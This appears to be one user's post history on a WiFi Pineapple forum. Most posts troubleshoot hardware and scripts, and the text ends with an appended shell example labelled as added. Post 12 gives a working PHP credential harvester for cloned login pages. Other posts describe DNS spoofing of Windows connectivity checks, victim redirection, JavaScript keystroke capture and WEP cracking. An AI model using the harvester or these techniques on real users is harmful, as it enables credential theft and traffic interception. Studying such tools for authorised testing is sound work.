Everything posted by coolgeek

  1. I just wanted to share some video tutorials that I have found very helpful in setting up and administering the WiFi Pineapple: Security4Plus. I'm not sure if the creator is active on the forums, but I have not seen any links to these tutorials. This resource was indispensable to me for setting up remote administration through a VPS.
  2. The problem is that the key never gets sent in plain text. IEEE 802.11 WEP Authentication works as follows:

       • Client sends a request
       • AP sends client a challenge text (i.e. an arbitrary 128-bit number)
       • The client uses the WEP Key to encrypt the challenge text and sends it to the AP
       • The AP checks for accuracy and grants/denies access based on the result

     The way that WEP Key cracking works is that by capturing packets we gather samples of challenge text and cyphertext pairs to figure out what the key is. Many samples are needed to crack the key effectively. In theory a Pineapple-esque device should be able to make the client reauthenticate itself over and over until enough cyphertext has been captured to crack the key, but I don't think it would be worth the research since WEP is pretty much obsolete. The other question might be if Jasager could be modified to authenticate clients trying to connect to a WEP network; I'm not sure how much work it would be, but doubt that the practicality would pay off.
  3. This is a possible setup, but you will need a second wifi adapter for your pineapple as well. Blacklisting should not be necessary, since surely you don't have it set to auto connect to any network.
  4. I have read about power issues; try checking if you have the same problem when powering through the AC adapter. Also, are you using a USB hub? If so, try plugging the key directly into the pineapple.
  5. Have you tried using the PoE port on the pineapple instead of the WAN? To my knowledge the PoE port is the one that's configured for 172.16.42.42, whereas the WAN port attempts to get the new IP for the pineapple through DHCP.
  6. Probably the easiest way to accomplish this is creating a page that is hosted on the pineapple that redirects traffic to the rick roll of your choice :-)
  7. The only parameter that the manual omitted is that the partitions should be created as Primary. It should show up in the Disk Usage section under Resources, even if the drive does not mount to /usb.
  8. It must be to an IP, but since most www.whatever.com sites have a static IP, that isn't too big of a deal.
  9. I'm pretty sure the PoE port is set to connect to 172.16.42.42. Try to give that a shot.
  10. It seems like a problem with ICS - the pineapple is not getting access to the interwebs. You should be able to confirm this by clicking "reveal public ip" on the status page. The only thing that I can think of is playing with the ./wp4.sh script. Have you tried using all the default values, i.e. just pressing enter without entering your own data?
  11. The problem with WPA/WPA2 secured connections is that a 4-way handshake takes place, in which both AP and client confirm the key without actually revealing it. Read more about the process here.
  12. I have found the easiest way to clone a site is to use Google Chrome, browse to the site, right-click and select Save As... This gives you the option to download the entire page with all dependencies. From there, just use this resource to modify what happens to the form data. I think Darren wrote the following little PHP file to store the user credentials from the form data received:

          <?php
          $ref = $_SERVER['HTTP_REFERER'];
          $today = date("F j, Y, g:i a");
          if (isset($_POST['name']) && !empty($_POST['name'])) {
              $nam = stripslashes($_POST['name']);
              $pas = stripslashes($_POST['pass']);
              $nam = htmlspecialchars($nam, ENT_QUOTES);
              $pas = htmlspecialchars($pas, ENT_QUOTES);
              $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
              $filed = @fopen("bitches.txt", "a+");
              @fwrite($filed, "$content\n");
              @fclose($filed);
          }
          ?>
  13. You can use the command df -h. My output is the following:

          Filesystem            Size      Used Available Use% Mounted on
          rootfs              960.0K    504.0K    456.0K  53% /
          /dev/root             5.3M      5.3M         0 100% /rom
          tmpfs                14.4M    572.0K     13.8M   4% /tmp
          tmpfs               512.0K         0    512.0K   0% /dev
          /dev/mtdblock3      960.0K    504.0K    456.0K  53% /overlay
          overlayfs:/overlay  960.0K    504.0K    456.0K  53% /
          /dev/sda1            28.4G    577.2M     26.4G   2% /usb

      My usb drive is detected as /dev/sda1, and mounted to /usb through fstab.
  14. I'm using a 32GB PNY drive and have no issues. The only recommendation I have is checking where the drive is being mounted (/dev/sd??) and modifying the fstab config accordingly. Don't forget the "makeswap" command as well.
  15. As a side note, I tested the Network Connection Status Indicator in Windows 8, and it seems that as long as the DNS of dns.msftncsi.com resolves to 131.107.255.25 it shows an internet connection - it looks like MS dropped the validation by downloading the text file. So a simple entry into the DNS Spoof Config can validate that request. I tested this and it works like a charm - NCSI shows an internet connection when connected to an offline pineapple. Now I just need to figure out a way to redirect all other traffic, i.e. hosts other than dns.msftncsi.com, to a landing page. A simple wildcard entry overrides the validation DNS. There's no way to set priorities, is there?
  16. SystemCrash86, Which page is showing as the Landing Page in the pineapple's Configuration screen? That is what traffic is first redirected to.
  17. I guess you'll have to ask yourself where that traffic is redirected to, and what the purposes of index.php and redirect.php are.
  18. I'm with newbi3 on this. Use the laptop you loaded with Backtrack 5 to do the tinkering and learning how things work. Remember, pen-testing is 90% research.
  19. Maybe the LED Control post will help you out. I don't think there is anything built in, but it shouldn't be too hard to throw together a script that lets you toggle it on and off as many times as you like. Something like this comes to mind:

          #!/bin/bash
          # Blink the WPS LED $1 times: one second off, one second on.
          # C-style loop, since bash does not expand variables inside {1..N}.
          for ((i = 1; i <= $1; i++))
          do
              echo 0 > /sys/class/leds/alfa\:blue\:wps/brightness
              sleep 1
              echo 255 > /sys/class/leds/alfa\:blue\:wps/brightness
              sleep 1
          done

      In no way elegant, but it should do the job to let you know when a script is starting or has ended.
  20. Good catch, midnitesnake,

          usb_modeswitch -v 12d1 -p 1446 -V 12d1 -P 1001 -M 55534243123456780000000000000011060000000000000000000000000000 -n 1 -s 20

      The pid was switched from the original 0x1446 to 0x1001 prior to the insmod command.
  21. Under the Resources tab, make sure the USB drive is mounted under sda1. You should have a line similar to this under "Disk Usage":

          /dev/sda1 28.4G 576.5M 26.4G 2% /usb

      I have a suspicion that it might be mounting as sdb1; in that case you would have to change the Config Mount in the USB tab to reflect that.
  22. petertfm, I'm sure that digininja or WM will clarify, but it is my understanding that the keystrokes are captured through a JavaScript injection as the user types, and are independent of how the data is transferred to the server. sslstripping should not be necessary.
  23. JMBro, You can check the Bandwidth being used with the link on top of the Status module. If you are interested in seeing specific URL traffic, i.e. what websites the target is visiting, you'll need to use a Man in the Middle (MITM) attack like URLsnarf (Module is available at the Juice Bar).
  24. I think this is a great idea, since it will greatly aid in proving to people the dangers of using WEP. With the Pineapple stowed away in a backpack, one could trigger the module from an Android phone and at least make the impression that it only takes a few clicks to access a WEP network. I have started looking into doing this, and my approach is to port autocrack.sh from http://code.google.com/p/autocrack/ to the WiFi Pineapple. Once I have it working, the second (and probably more difficult) part will be creating a module for it. I'm a n00b when it comes to Linux and Bash scripts, so I believe this will be a good exercise in learning the ropes. If any of you are interested, I'd be more than happy to make this a collaborative project to share the knowledge.
  25. I'm receiving the same errors as tertko. It can't find sslstrip with the default autostart, and once I give it the full path name for sslstrip there is an error finding python. My SSH connection doesn't work properly on start either, but the persist script that runs every 5 minutes "fixes" that. I did a quick check on the environment variables, and it seems like the USB locations aren't added until after the autostart script runs.

      During autostart.sh:

          PATH='/sbin:/usr/sbin:/bin:/usr/bin'

      Pineapple up and running:

          PATH='/bin:/sbin:/usr/bin:/usr/sbin:/usb/usr/bin:/usb/usr/sbin'

      The missing env's can be added to make things work, but this seems to be more of an ad hoc solution:

          export PATH=${PATH}:/usb/usr/bin:/usb/usr/sbin

      I need to do further research on when the usb variables are added, and check if it can either be moved up in the startup process or if the execution of autostart can be delayed. Mk4 2.7.0
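
The startup ordering problem described in post 25, handled defensively in POSIX sh. This is an added example, not code from the original post or from the Pineapple firmware: the function names `path_append` and `wait_for_cmd` are hypothetical, while the `/usb/usr/bin` and `/usb/usr/sbin` directories and the `sslstrip` command are the ones quoted in the post.

```shell
#!/bin/sh
# Added example (not firmware code): make a boot-time script tolerate
# USB-backed directories that are mounted after the script starts.

# Append a directory to PATH only if it exists and is not already
# listed, so repeated calls never grow PATH with duplicates.
path_append() {
    dir=$1
    [ -d "$dir" ] || return 1          # not mounted (yet)
    case ":$PATH:" in
        *":$dir:"*) return 0 ;;        # already present
    esac
    PATH="$PATH:$dir"
    export PATH
}

# Poll until a command resolves on PATH, retrying path_append for the
# late-mounted directories on every pass.
# Args: command name, timeout in seconds, then candidate directories.
wait_for_cmd() {
    cmd=$1
    timeout=$2
    shift 2
    elapsed=0
    while :; do
        for d in "$@"; do
            path_append "$d" || true   # a missing dir is not fatal here
        done
        if command -v "$cmd" >/dev/null 2>&1; then
            return 0
        fi
        if [ "$elapsed" -ge "$timeout" ]; then
            return 1                   # give up instead of hanging boot
        fi
        sleep 1
        elapsed=$((elapsed + 1))
    done
}

# Usage inside an autostart script (60-second limit is an assumption):
#   wait_for_cmd sslstrip 60 /usb/usr/bin /usb/usr/sbin || exit 1
#   wait_for_cmd python   60 /usb/usr/bin /usb/usr/sbin || exit 1
```

Failing with a non-zero status after the timeout keeps a missing or unmounted USB drive from stalling the rest of the boot sequence.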